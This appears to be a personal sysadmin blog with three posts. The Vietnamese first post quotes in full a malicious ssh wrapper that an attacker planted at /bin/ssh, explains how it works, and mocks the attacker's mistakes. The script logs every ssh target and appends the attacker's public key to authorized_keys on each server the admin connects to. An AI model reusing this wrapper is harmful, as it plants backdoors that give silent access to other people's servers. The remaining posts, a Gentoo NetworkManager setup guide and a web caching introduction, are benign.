28 Jul 2011

Thông minh và ngu ngốc

Đầu tiên các bạn hãy đọc script ngắn bên dưới

#!/usr/bin/env bash                              
SSH=`which ssh`; echo $@ >> /dev/shm/.h ; $SSH $@ "[ ! -f /dev/shm/.z ] && echo "a" > /dev/shm/.z && echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxTOlT9QywvpMMuohn+S2kKp9XmQRIEh4Pba3VJWB7S5fk/l1Qhi5n1M6OOd2/N4GAxgVAk8ylcVcJJJ7ErPGJSB0BgWeuiM7lszYwy9KOUZdliqGnCCFUSv/zzqlCJ1DLXdlnn1jbBlq1WNphORiZAx8ZJwUkR8SByT21WtLtcugx3H0IdJOR9ZkGZzAtnCFb/DY8NRIQ4SRnlvqColZg2LpY1EcsClmYIYpxXlm6yQ7phP1gqBwGIcPgUEgDt8YY+nO1jNEr3/vV5z14zXXoTfDb5MimfgqwkeIY+Ak6I+CLoq3p79xY1IVxNCI5a5h7dsffoao23o45fojfdfDDAd55 fuckeratnowhere" >> .ssh/authorized_keys"; $SSH $@
Nếu có ai không hiểu script trên nói gì thì mình sẽ giải thích. Script trên đặt một biến SSH có nội dung là đường dẫn tới command ssh trên hệ thống đang chạy command trên, sau đó đưa tham số truyền vào sau command (thường sẽ là IP chúng ta cần ssh tới) vào một file log có tên là .h ở thư mục /dev/shm, tiếp theo đó, thực thi lệnh ssh tới server với IP trên, kiểm tra sự tồn tại của file .z ở thư mục /dev/shm, nếu không có, thì tạo file .z và đưa nội dụng public key vào file authorized_key, và trở lại thực thi câu lệnh ssh như bình thường.

Nội dung command trên được một bạn so-called hacker sau khi bằng cách nào đó up được shell lên một server đã lưu ở /bin/ssh.
Vì sao đặt ở /bin/ssh ?

hungnv@tinytux ~ $ echo $PATH
/bin:/usr/local/bin:/usr/bin:/opt/bin:/usr/x86_64-pc-linux-gnu/gcc-bin/4.4.5:/usr/lib/:/usr/sbin/:/sbin:/opt/:/usr/libexec:/home/hungnv/bin

Giả dụ như $PATH của bạn như trên, thì khi thực thi lệnh ssh tới một server, /bin/ssh sẽ được thực thi thay vì /usr/bin/ssh thực sự.
Người quản trị server này bất cứ lúc nào cần ssh tới một server khác khi đang đứng trên server đã bị tấn công bên trên, nghiễm nhiên gán quyền cho kẻ tấn công login vào server đó mà không cần chứng thực.
Kẻ tấn công còn thông minh ở chỗ ghi lại log ở file /dev/shm/.h, để có thể biết được System admin đã giúp mình owned được bao nhiêu server. Phải nói rằng hắn ta rất thông minh,

Nhưng tiêu đề bài post là thông minh và ngu ngốc?
Điểm ngu ngốc thứ nhất, kẻ tấn công dùng Windows (và có thể là notepad của Windows) để soạn script trên. Vô tình Windows có khuyến mãi thêm vài kí tự đặc biệt, thông thường dos2unix $FILENAME sẽ giải quyết được, nhưng vì nôn nóng, hắn quên mất. Do đó khi bash shell gặp kí tự đặc biệt trên, không hiểu và báo Bad interpreter , command ssh không thực hiện được. Và dĩ nhiên ssh tự nhiên không thực hiện được thì theo thói quen, người quản trị sẽ
1. which ssh
2. file /bin/ssh
/bin/ssh: a bash script text executable

3. cat /bin/ssh
và wow, someone fucked my server!!!!!!!!!!!
Điểm ngu ngốc thứ 2: đáng ra hắn phải kiểm tra script trên có hoạt động được không trước khi upload lên server (có lẽ do quá tự tin chăng?)

Nói tóm lại, người quản trị hệ thống này may mắn quá, vì gặp được một anh thông minh đúng chỗ và ngu ngốc cũng đúng chỗ ;).


14 Jul 2011

Get networkmanager and nm-applet working with wireless on Gentoo

Well, more than 1 year working with install_and_use distro (Fedora) makes my brain slow. It takes me about 1/2 day to get it works.

1. Check your USE flag to make sure it has these things:
         bluetooth avahi connection-sharing dhclient autoipd dhcpcd dhclient gnutls nss resolvconf
If you are using the same USE flag with me: ( -* ) , just set it when emerge:
          USE="bluetooth avahi connection-sharing dhclient autoipd dhcpcd dhclient gnutls nss resolvconf" emerge -Nav networkmanager
2.  Install nm-applet(with USE="-doc -debug bluetooth).

3. On this directory, edit all configuration files:
           /etc/dbus-1/system.d
replace every line that contain user="root" with group="plugdev"

4. Add your user and root to group plugdev, add yourself to group netdev
5. Restart dbus, and volla, enjoy wireless networking.

*If you dont add root to group plugdev as step 4, sure you will the error:

Jul 15 21:13:26 tinytux dbus[14800]: [system] Failed to activate service 'org.freedesktop.PolicyKit1': timed out
Jul 15 21:13:26 tinytux NetworkManager: polkit_authority_get: Error getting authority: Error initializing authority: Error calling StartServiceByName for org.freedesktop.PolicyKit1: GDBus.Error:org.freedesktop.DBus.Error.TimedOut: Activation of org.freedesktop.PolicyKit1 timed out
Jul 15 21:13:26 tinytux NetworkManager: nm_sysconfig_settings_init: failed to create PolicyKit authority.
I'm sure you know why ;)

9 Jul 2011

Web Caching

(Part 1)
Một caching server là server đứng giữa clients và web servers, trả lời request từ client thay cho web server nếu như:
1. Client request html object đã được lưu trữ trong bộ nhớ cache.
2. Cache object là version cùng với version được sinh ra từ web servers nếu request vào được đến web server (fresh).

Web cache có 3 loại: browser cache, proxy cache (forward proxy, transparent proxy), và gateway cache (reverse proxy). Ở đây chúng ta chỉ nhắc đến loại thứ 3: Reverse proxy cache, ngắn gọn là reverse proxy.
Một mô hình reverse proxy đơn giản như sau:
                           Clients -------- Reverse proxy --------- Web Servers

Disqus